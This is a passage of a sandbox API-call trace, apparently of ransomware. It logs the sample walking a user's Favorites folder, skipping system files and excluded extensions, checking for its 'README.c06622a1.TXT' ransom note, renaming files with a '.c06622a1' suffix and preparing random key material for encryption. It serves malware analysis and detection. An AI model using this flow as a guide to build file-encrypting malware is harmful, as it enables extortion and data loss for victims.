RtlComputeCrc32 (PartialCrc=0xa038, Buffer=0x4b80094, Length=0x80) returned 0x91f72c5 [0150.296] RtlComputeCrc32 (PartialCrc=0x72c5, Buffer=0x4b80094, Length=0x80) returned 0xc09c6113 [0150.296] RtlComputeCrc32 (PartialCrc=0x6113, Buffer=0x4b80094, Length=0x80) returned 0x921fce4c [0150.296] RtlComputeCrc32 (PartialCrc=0xce4c, Buffer=0x4b80094, Length=0x80) returned 0x9c672ff9 [0150.296] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4b80020) returned 1 [0150.296] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.296] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.296] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0150.296] _wcsicmp (_Str1="Windows Live Mail.url", _Str2="README.c06622a1.TXT") returned 5 [0150.296] wcsstr (_Str="Windows Live Mail.url", _SubStr="README") returned 0x0 [0150.296] _wcsicmp (_Str1="autorun.inf", _Str2="Windows Live Mail.url") returned -22 [0150.296] wcslen (_String="autorun.inf") returned 0xb [0150.296] _wcsicmp (_Str1="boot.ini", _Str2="Windows Live Mail.url") returned -21 [0150.296] wcslen (_String="boot.ini") returned 0x8 [0150.296] _wcsicmp (_Str1="bootfont.bin", _Str2="Windows Live Mail.url") returned -21 [0150.296] wcslen (_String="bootfont.bin") returned 0xc [0150.296] _wcsicmp (_Str1="bootsect.bak", _Str2="Windows Live Mail.url") returned -21 [0150.296] wcslen (_String="bootsect.bak") returned 0xc [0150.296] _wcsicmp (_Str1="desktop.ini", _Str2="Windows Live Mail.url") returned -19 [0150.296] wcslen (_String="desktop.ini") returned 0xb [0150.296] _wcsicmp (_Str1="iconcache.db", _Str2="Windows Live Mail.url") returned -14 [0150.296] wcslen (_String="iconcache.db") returned 0xc [0150.296] _wcsicmp (_Str1="ntldr", _Str2="Windows Live Mail.url") returned -9 [0150.296] wcslen (_String="ntldr") returned 0x5 [0150.296] _wcsicmp (_Str1="ntuser.dat", _Str2="Windows Live Mail.url") returned -9 [0150.296] wcslen (_String="ntuser.dat") returned 0xa [0150.296] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Windows Live Mail.url") returned -9 [0150.296] wcslen (_String="ntuser.dat.log") returned 0xe [0150.296] _wcsicmp (_Str1="ntuser.ini", _Str2="Windows Live Mail.url") returned -9 [0150.296] wcslen (_String="ntuser.ini") returned 0xa [0150.296] _wcsicmp (_Str1="thumbs.db", _Str2="Windows Live Mail.url") returned -3 [0150.296] wcslen (_String="thumbs.db") returned 0x9 [0150.296] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.296] wcslen (_String="386") returned 0x3 [0150.297] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.297] wcslen (_String="adv") returned 0x3 [0150.297] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.297] wcslen (_String="ani") returned 0x3 [0150.297] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.297] wcslen (_String="bat") returned 0x3 [0150.297] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.297] wcslen (_String="bin") returned 0x3 [0150.297] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.297] wcslen (_String="cab") returned 0x3 [0150.297] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.297] wcslen (_String="cmd") returned 0x3 [0150.297] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.297] wcslen (_String="com") returned 0x3 [0150.297] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.297] wcslen (_String="cpl") returned 0x3 [0150.297] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.297] wcslen (_String="cur") returned 0x3 [0150.297] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.297] wcslen (_String="deskthemepack") returned 0xd [0150.297] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.297] wcslen (_String="diagcab") returned 0x7 [0150.297] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.297] wcslen (_String="diagcfg") returned 0x7 [0150.297] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.297] wcslen (_String="diagpkg") returned 0x7 [0150.297] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.297] wcslen (_String="dll") returned 0x3 [0150.297] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.297] wcslen (_String="drv") returned 0x3 [0150.297] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.297] wcslen (_String="exe") returned 0x3 [0150.297] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.297] wcslen (_String="hlp") returned 0x3 [0150.297] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.297] wcslen (_String="icl") returned 0x3 [0150.297] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.298] wcslen (_String="icns") returned 0x4 [0150.298] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.298] wcslen (_String="ico") returned 0x3 [0150.298] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.298] wcslen (_String="ics") returned 0x3 [0150.298] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.298] wcslen (_String="idx") returned 0x3 [0150.298] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.298] wcslen (_String="ldf") returned 0x3 [0150.298] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.298] wcslen (_String="lnk") returned 0x3 [0150.298] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.298] wcslen (_String="mod") returned 0x3 [0150.298] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.298] wcslen (_String="mpa") returned 0x3 [0150.298] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.298] wcslen (_String="msc") returned 0x3 [0150.298] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.298] wcslen (_String="msp") returned 0x3 [0150.298] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.298] wcslen (_String="msstyles") returned 0x8 [0150.298] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.298] wcslen (_String="msu") returned 0x3 [0150.298] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.298] wcslen (_String="nls") returned 0x3 [0150.298] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.298] wcslen (_String="nomedia") returned 0x7 [0150.298] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.298] wcslen (_String="ocx") returned 0x3 [0150.298] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.298] wcslen (_String="prf") returned 0x3 [0150.298] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.298] wcslen (_String="ps1") returned 0x3 [0150.298] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.298] wcslen (_String="rom") returned 0x3 [0150.298] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.298] wcslen (_String="rtp") returned 0x3 [0150.299] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.299] wcslen (_String="scr") returned 0x3 [0150.299] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.299] wcslen (_String="shs") returned 0x3 [0150.299] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.299] wcslen (_String="spl") returned 0x3 [0150.299] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.299] wcslen (_String="sys") returned 0x3 [0150.299] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.299] wcslen (_String="theme") returned 0x5 [0150.299] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.299] wcslen (_String="themepack") returned 0x9 [0150.299] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.299] wcslen (_String="wpx") returned 0x3 [0150.299] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.299] wcslen (_String="lock") returned 0x4 [0150.299] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.299] wcslen (_String="key") returned 0x3 [0150.299] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.299] wcslen (_String="hta") returned 0x3 [0150.299] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.299] wcslen (_String="msi") returned 0x3 [0150.299] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.299] wcslen (_String="pdb") returned 0x3 [0150.299] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.299] wcslen (_String="sql") returned 0x3 [0150.299] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.299] wcslen (_String="sqlite") returned 0x6 [0150.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 0x10 [0150.299] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.299] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0150.299] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 0x38 [0150.300] wcscpy (in: _Dest=0x4500102, _Source="Windows Live Mail.url" | out: _Dest="Windows Live Mail.url") returned="Windows Live Mail.url" [0150.300] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", dwFileAttributes=0x80) returned 1 [0150.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0150.300] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.300] CloseHandle (hObject=0x61c) returned 1 [0150.300] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.300] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" [0150.300] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 0x4e [0150.300] wcscpy (in: _Dest=0x4510134, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.300] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.c06622a1"), dwFlags=0x8) returned 1 [0150.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x61c [0150.302] CreateIoCompletionPort (FileHandle=0x61c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.302] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4c10020 [0150.308] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x22ebd49c [0150.308] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7b7b4d70 [0150.308] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb18ca51 [0150.308] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6312ce5e [0150.308] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d0e8e97 [0150.308] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6b6ea216 [0150.308] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x17180f02 [0150.308] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x719bee2c [0150.311] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4c10094, Length=0x80) returned 0x31a8b243 [0150.311] RtlComputeCrc32 (PartialCrc=0xb243, Buffer=0x4c10094, Length=0x80) returned 0x69c37fb7 [0150.311] RtlComputeCrc32 (PartialCrc=0x7fb7, Buffer=0x4c10094, Length=0x80) returned 0xf0214e0f [0150.311] RtlComputeCrc32 (PartialCrc=0x4e0f, Buffer=0x4c10094, Length=0x80) returned 0x80a471e4 [0150.311] RtlComputeCrc32 (PartialCrc=0x71e4, Buffer=0x4c10094, Length=0x80) returned 0xa66a4a0a [0150.311] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4c10020) returned 1 [0150.311] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.311] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.311] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0150.311] _wcsicmp (_Str1="Windows Live Spaces.url", _Str2="README.c06622a1.TXT") returned 5 [0150.311] wcsstr (_Str="Windows Live Spaces.url", _SubStr="README") returned 0x0 [0150.311] _wcsicmp (_Str1="autorun.inf", _Str2="Windows Live Spaces.url") returned -22 [0150.311] wcslen (_String="autorun.inf") returned 0xb [0150.311] _wcsicmp (_Str1="boot.ini", _Str2="Windows Live Spaces.url") returned -21 [0150.311] wcslen (_String="boot.ini") returned 0x8 [0150.311] _wcsicmp (_Str1="bootfont.bin", _Str2="Windows Live Spaces.url") returned -21 [0150.311] wcslen (_String="bootfont.bin") returned 0xc [0150.311] _wcsicmp (_Str1="bootsect.bak", _Str2="Windows Live Spaces.url") returned -21 [0150.311] wcslen (_String="bootsect.bak") returned 0xc [0150.312] _wcsicmp (_Str1="desktop.ini", _Str2="Windows Live Spaces.url") returned -19 [0150.312] wcslen (_String="desktop.ini") returned 0xb [0150.312] _wcsicmp (_Str1="iconcache.db", _Str2="Windows Live Spaces.url") returned -14 [0150.312] wcslen (_String="iconcache.db") returned 0xc [0150.312] _wcsicmp (_Str1="ntldr", _Str2="Windows Live Spaces.url") returned -9 [0150.312] wcslen (_String="ntldr") returned 0x5 [0150.312] _wcsicmp (_Str1="ntuser.dat", _Str2="Windows Live Spaces.url") returned -9 [0150.312] wcslen (_String="ntuser.dat") returned 0xa [0150.312] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Windows Live Spaces.url") returned -9 [0150.312] wcslen (_String="ntuser.dat.log") returned 0xe [0150.312] _wcsicmp (_Str1="ntuser.ini", _Str2="Windows Live Spaces.url") returned -9 [0150.312] wcslen (_String="ntuser.ini") returned 0xa [0150.312] _wcsicmp (_Str1="thumbs.db", _Str2="Windows Live Spaces.url") returned -3 [0150.312] wcslen (_String="thumbs.db") returned 0x9 [0150.312] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.312] wcslen (_String="386") returned 0x3 [0150.312] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.312] wcslen (_String="adv") returned 0x3 [0150.312] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.312] wcslen (_String="ani") returned 0x3 [0150.312] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.312] wcslen (_String="bat") returned 0x3 [0150.312] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.312] wcslen (_String="bin") returned 0x3 [0150.312] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.312] wcslen (_String="cab") returned 0x3 [0150.312] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.312] wcslen (_String="cmd") returned 0x3 [0150.312] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.312] wcslen (_String="com") returned 0x3 [0150.312] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.312] wcslen (_String="cpl") returned 0x3 [0150.312] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.312] wcslen (_String="cur") returned 0x3 [0150.312] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.312] wcslen (_String="deskthemepack") returned 0xd [0150.313] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.313] wcslen (_String="diagcab") returned 0x7 [0150.313] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.313] wcslen (_String="diagcfg") returned 0x7 [0150.313] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.313] wcslen (_String="diagpkg") returned 0x7 [0150.313] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.313] wcslen (_String="dll") returned 0x3 [0150.313] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.313] wcslen (_String="drv") returned 0x3 [0150.313] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.313] wcslen (_String="exe") returned 0x3 [0150.313] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.313] wcslen (_String="hlp") returned 0x3 [0150.313] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.313] wcslen (_String="icl") returned 0x3 [0150.313] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.313] wcslen (_String="icns") returned 0x4 [0150.313] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.313] wcslen (_String="ico") returned 0x3 [0150.313] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.313] wcslen (_String="ics") returned 0x3 [0150.313] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.313] wcslen (_String="idx") returned 0x3 [0150.313] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.313] wcslen (_String="ldf") returned 0x3 [0150.313] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.313] wcslen (_String="lnk") returned 0x3 [0150.313] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.313] wcslen (_String="mod") returned 0x3 [0150.313] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.313] wcslen (_String="mpa") returned 0x3 [0150.313] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.313] wcslen (_String="msc") returned 0x3 [0150.313] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.313] wcslen (_String="msp") returned 0x3 [0150.313] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.314] wcslen (_String="msstyles") returned 0x8 [0150.314] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.314] wcslen (_String="msu") returned 0x3 [0150.314] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.314] wcslen (_String="nls") returned 0x3 [0150.314] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.314] wcslen (_String="nomedia") returned 0x7 [0150.314] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.314] wcslen (_String="ocx") returned 0x3 [0150.314] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.314] wcslen (_String="prf") returned 0x3 [0150.314] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.314] wcslen (_String="ps1") returned 0x3 [0150.314] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.314] wcslen (_String="rom") returned 0x3 [0150.314] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.314] wcslen (_String="rtp") returned 0x3 [0150.314] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.314] wcslen (_String="scr") returned 0x3 [0150.314] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.314] wcslen (_String="shs") returned 0x3 [0150.314] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.314] wcslen (_String="spl") returned 0x3 [0150.314] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.314] wcslen (_String="sys") returned 0x3 [0150.314] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.314] wcslen (_String="theme") returned 0x5 [0150.314] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.314] wcslen (_String="themepack") returned 0x9 [0150.314] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.314] wcslen (_String="wpx") returned 0x3 [0150.314] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.314] wcslen (_String="lock") returned 0x4 [0150.314] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.314] wcslen (_String="key") returned 0x3 [0150.314] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.315] wcslen (_String="hta") returned 0x3 [0150.315] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.315] wcslen (_String="msi") returned 0x3 [0150.315] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.315] wcslen (_String="pdb") returned 0x3 [0150.315] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.315] wcslen (_String="sql") returned 0x3 [0150.315] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.315] wcslen (_String="sqlite") returned 0x6 [0150.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 0x10 [0150.315] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.315] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0150.315] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 0x38 [0150.315] wcscpy (in: _Dest=0x4500102, _Source="Windows Live Spaces.url" | out: _Dest="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0150.315] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", dwFileAttributes=0x80) returned 1 [0150.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x66c [0150.315] SetFilePointerEx (in: hFile=0x66c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.315] CloseHandle (hObject=0x66c) returned 1 [0150.315] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.315] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" [0150.316] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 0x50 [0150.316] wcscpy (in: _Dest=0x4510138, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.316] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.c06622a1"), dwFlags=0x8) returned 1 [0150.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x66c [0150.319] CreateIoCompletionPort (FileHandle=0x66c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.320] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4ca0020 [0150.325] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a46f8c5 [0150.325] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78092d01 [0150.325] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x441357b8 [0150.325] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2d0de24e [0150.325] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c350d39 [0150.325] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77a63c9 [0150.325] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6f038291 [0150.325] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x46a2f749 [0150.328] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4ca0094, Length=0x80) returned 0xbf40819d [0150.328] RtlComputeCrc32 (PartialCrc=0x819d, Buffer=0x4ca0094, Length=0x80) returned 0x82c39d78 [0150.328] RtlComputeCrc32 (PartialCrc=0x9d78, Buffer=0x4ca0094, Length=0x80) returned 0xb05085f6 [0150.328] RtlComputeCrc32 (PartialCrc=0x85f6, Buffer=0x4ca0094, Length=0x80) returned 0xaf2e8480 [0150.328] RtlComputeCrc32 (PartialCrc=0x8480, Buffer=0x4ca0094, Length=0x80) returned 0xc0b00558 [0150.328] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ca0020) returned 1 [0150.328] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.328] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.328] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: 